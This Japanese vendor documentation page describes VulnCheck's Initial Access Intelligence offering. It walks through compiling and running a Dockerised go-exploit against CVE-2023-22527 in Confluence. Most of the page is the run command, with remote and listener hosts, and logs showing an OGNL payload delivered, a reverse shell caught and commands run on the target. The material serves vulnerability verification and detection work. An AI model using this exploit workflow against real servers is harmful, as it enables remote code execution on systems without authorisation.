Initial Access Intelligence
エクスプロイトコードのコンパイル
Dockerを使用してVulnCheckが提供するgo-exploitスキャナーをコンパイルおよび実行します
VulnCheckのInitial Access Intelligence製品は、組織に対して、Dockerで提供される自社開発のエクスプロイトやネットワークスキャナー、パケットキャプチャ(PCAPファイル)、エクスプロイト検出用のSuricata & Snortシグネチャ、YARAルール(可能な場合)、CPE文字列、Nmapスクリプト、脆弱なDockerファイル、GreyNoiseタグへのマッピング、CensysやShodanを使用した潜在的に脆弱なシステムのインターネットレベルでの露出測定を提供します。VulnCheckは、これらの検出アーティファクトをパッケージ化して、組織が脅威を検出および対応できるように支援します。
VulnCheckのエクスプロイト概念実証(PoC)およびネットワークスキャナーコードは、Goプログラミング言語で記述されています。これらは使いやすいようにDockerfileと共に提供されています。エクスプロイトは、VulnCheckが作成し、管理しているgo-exploitと呼ばれるオープンソースソフトウェア(OSS)の共有ライブラリを利用しています。
以下の例は、CVE-2023-22527に対するgo-exploitのコンパイルと使用方法を示しています:
user@vc:/initial-access/feed/cve-2023-22527$ make docker
user@vc:/initial-access/feed/cve-2023-22527$ docker run -it --network=host cve-2023-22527 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-02-22T18:05:27.675Z level=STATUS msg="Starting listener on 10.9.49.85:1270"
time=2024-02-22T18:05:27.675Z level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8090 ssl=false "ssl auto"=false
time=2024-02-22T18:05:27.675Z level=STATUS msg="Validating Confluence target" host=10.9.49.88 port=8090
time=2024-02-22T18:05:28.018Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.88 port=8090 verified=true
time=2024-02-22T18:05:28.018Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8090
time=2024-02-22T18:05:28.202Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.88 port=8090 version=8.5.3
time=2024-02-22T18:05:28.202Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8090 vulnerable=yes
time=2024-02-22T18:05:28.202Z level=STATUS msg="Sending OGNL expression size limit adjustment to http://10.9.49.88:8090/template/aui/text-inline.vm"
time=2024-02-22T18:05:28.384Z level=STATUS msg="Sending class EzrKbvJgvWl to http://10.9.49.88:8090/template/aui/text-inline.vm"
time=2024-02-22T18:05:28.421Z level=SUCCESS msg="Caught new shell from 10.9.49.88:42562"
time=2024-02-22T18:05:28.421Z level=STATUS msg="Active shell from 10.9.49.88:42562"
time=2024-02-22T18:05:38.390Z level=STATUS msg="Exploit successfully completed" exploited=true
whoami
confluence
id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
